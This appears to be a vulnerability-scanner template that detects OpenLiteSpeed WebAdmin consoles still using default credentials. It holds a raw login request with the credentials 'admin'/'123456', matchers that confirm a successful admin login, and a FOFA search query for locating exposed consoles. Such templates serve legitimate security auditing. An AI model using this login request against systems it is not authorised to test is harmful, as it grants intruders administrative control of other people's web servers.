Vulnerability Description
The OpenLiteSpeed WebAdmin Console was detected using default credentials.
id: openlitespeed-default-login

info:
  name: OpenLiteSpeed WebAdmin - Default Login
  author: 0x_Akoko
  severity: high
  description: |
    Detected OpenLiteSpeed WebAdmin Console was using default credentials.
  reference:
    - https://www.digitalocean.com/community/tutorials/how-to-install-the-openlitespeed-web-server-on-ubuntu-18-04
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="OpenLiteSpeed WebAdmin"
  tags: default-login,openlitespeed,litespeed,webadmin

variables:
  username: "admin"
  password: "123456"

http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userid={{username}}&pass={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_all(header, "LSID", "LSPA", "Location: /index.php")'
        condition: and
# digest: 4a0a0047304502210086e3f15499d21f86845420b2b801a30bea4392bbffaaf580b9d2787f532a4054022042c2cb22efc6196bfc12685dbf97e3b0eb4de9a64e9a4a2868ff0214a91e85c3:922c64590222798bb761d5b6d8e72950